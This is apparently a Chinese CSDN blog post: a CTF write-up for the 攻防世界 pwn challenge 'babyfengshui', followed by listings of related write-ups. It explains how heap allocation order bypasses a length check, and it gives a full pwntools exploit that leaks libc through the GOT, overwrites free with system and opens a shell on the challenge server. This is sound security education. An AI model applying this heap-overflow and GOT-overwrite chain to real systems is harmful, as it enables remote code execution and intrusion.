(攻防世界)(pwn)babyfengshui

最新推荐文章于 2023-03-15 22:50:00 发布
最新推荐文章于 2023-03-15 22:50:00 发布
阅读量1.3k 收藏 4
点赞数 2
文章标签: 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/98328466
版权

入门级的堆题,拿来学习还是不错的。

做这道题之前,最好还是先对堆的数据结构有一定的了解。
拿到题目,下载附件,查看保护。
在这里插入图片描述
一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。
把文件拖进IDA查看逻辑:
在这里插入图片描述

可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。
进入增加用户功能:
在这里插入图片描述

可以看到,程序先malloc一个块用于保存数据,再malloc一个块作为结构体,用于保存name和description,name为124,也就是0x7c,注意他们都是指针哦。
在这里插入图片描述
这里有个保护就是v3+*ptr[a1]<=*ptr[a1]-4才行
意思就是你写入的数据不能把后面的结构体给覆盖了,但是这却没有考虑堆申请的规则。

题目思路:

我们首先申请两个堆,然后释放掉一个,在申请一个大的,根据堆的数据结构申请规则,就会产生绕过保护的现象,如下图:
在这里插入图片描述

这样我们就绕过了题目的保护,我们就可以利用struct的指针改写got表中的内容了,这就是简单的堆溢出了。
完整exp:

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
p=remote('111.198.29.45',40079)
elf=ELF('./babyfengshui')
obj=LibcSearcher('free',0xf7659750)
def add_note(size,length,text):
    p.recvuntil('Action: ')
    p.sendline('0')
    p.recvuntil('size of description: ')
    p.sendline(str(size))
    p.recvuntil('name: ')
    p.sendline('AAA')
    p.recvuntil('text length: ')
    p.sendline(str(length))
    p.recvuntil('text: ')
    p.sendline(text)
def delete_note(idx):
    p.recvuntil('Action: ')
    p.sendline('1')
    p.recvuntil('index: ')
    p.sendline(str(idx))
def display_note(idx):
    p.recvuntil('Action: ')
    p.sendline('2')
    p.recvuntil('index: ')
    p.sendline(str(idx))
def update_note(idx,length,text):
    p.recvuntil('Action: ')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(idx))
    p.recvuntil('text length: ')
    p.sendline(str(length))
    p.sendlineafter('text: ',text)
add_note(0x80,0x80,'aaa')
add_note(0x80,0x80,'bbb')
add_note(0x8,0x8,'/bin//sh')
delete_note(0)
add_note(0x100,0x19c,'a'*0x198+p32(elf.got['free']))   
display_note(1)                                                        
p.recvuntil('description: ')
free_addr=u32(p.recv(4))
print hex(free_addr)
offset=free_addr-obj.dump('free')
sys_addr=obj.dump('system')+offset
update_note(1,0x4,p32(sys_addr))			#利用description的指针是指向got表的原理,改变description指针指向的地址的值改为system函数
delete_note(2)
p.interactive()
PLpa、
关注
pwn】 33c32016_babyfengshui
Nothing
12-13 256
例行检查 分析程序,注意到在输入内容的时候,输入限制是这样的。 if ( (char *)(v3 + *(_DWORD *)*(&ptr + a1)) >= (char *)*(&ptr + a1) - 4 ) { puts("my l33t defenses cannot be fooled, cya!"); exit(1); ...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 444
攻防世界进阶PWN-100 做这道的时候远程环境可能有点问,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界PWNBabyfengshui
seaaseesa的博客
11-06 997
,首先,为了方便调试,我们需要解决alarm clock问 程序运行几十秒后就会自动退出,所以,为了方便调试,我们需要先修改一下这个二进制 我们用十六进制编辑器把这几个指令nop(0x90)掉即可 然后,我们就开始做了 查看创建功能的函数 这里创建了两个,第一个用来存储description,第二个用来存储第一个的指针以及name字符串 其数据...
攻防世界 pwn进阶区----No.012 babyfengshui思路
qq_29185043的博客
10-25 374
攻防世界 pwn进阶区----No.012 babyfengshui思路 1.本思路 1.先期工作 1.运行程序查看基本逻辑 创建用户 展示用户 更新用户 删除用户 到这里就可以猜测这有可能上的,重点查看删除的指针情况,以及溢出的情况。 2.运用checksec查看程序的保护措施 没有开启地址随...
攻防世界babyfengshui思路
aptx4869_li的博客
02-02 266
思路 基本信息查询 healer@healer:~/Documents/CTF/PWN/babyfengshui$ readelf -h babyfengshui ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, litt
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列23
重新启程
12-26 833
目地址:babyfengshui 这个目是高手进阶区的第12。本的主要考点是溢出,现在ctf主要的考点都已经转移到了溢出了,这个目作为溢出的基础目,还是很容易入门的。 先看看目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
babyfengshui__BUUCTF
Jc
09-29 597
其实这个用了两天,第一天拿上的时候比较浮躁,也没什么分析的效果,把做出来了,写个文章大家分析交流 我看网上大家都说这个适合入门得看,其实我感觉要是没接触过得话,理解起来还是比较困难的,我会将自己做的思路记录下来,让大家少踩点坑 做思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1421
学习pwn开始,慢慢来不要急
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1623
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 530
分析 这目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这有off
攻防世界pwn:Recho.doc
07-13
攻防世界pwn:Recho.doc 知识点总结 本文总结了攻防世界pwn:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn:Recho.doc是一...
babyfengshui(xctf)
weixin_43868725的博客
08-21 209
0x0 程序保护和流程 保护: 流程: main() add_user() 连续分配了两个块,并将第一次分配的块的指针存入第二次分配的块的fd字段,bk字段开始存放name,之后调用了update_user() 输入完length之后要经过判断,需要第一次分配的块的数据段的地址加上输入的长度的值必须小于第二次分配的块的数据段的地址减4的值才能输入text。 delete_user() 根据索引分别释放两个块,再将指向第二次分配块的指针清零。 display_user() 根据索引输
babyfengshui_33c3_2016[溢出]
、moddemod
06-26 360
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道出现在更新的时候边界的判断方法有问,结合的的机制,就可以形成溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
[XCTF-pwn] 27_babyfengshui
weixin_52640415的博客
03-09 360
输入长度判断错误。可写溢出。 数据结构: 管理块0x80: char *data_ptr; name[0x7c] 先写数据块再写管理块 unsigned int __cdecl read_text(unsigned __int8 a1) { char v2; // [esp+17h] [ebp-11h] BYREF int v3; // [esp+18h] [ebp-10h] BYREF unsigned int v4; // [esp+1Ch] [e...
【buu】babyfengshui_33c3_2016(详细解)
qq_62068476的博客
03-15 446
buu日常一
babyfengshui_33c3_2016
coco的博客
12-09 914
这道还是比较基础的,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
babyfengshui_33c3_2016
qq_33590156的博客
08-04 166
利用申请机制绕过溢出检查,关键点在edit中,后指针小于前指针则满足条件,但是如果将后指针挤到后面去,则可以溢出。 from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote("node3.buuoj.cn",29869) #ms = process("./33c3") elf = ELF("./33c3") def add(size,name,l
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 425
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的目,包括pwn和repeater目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值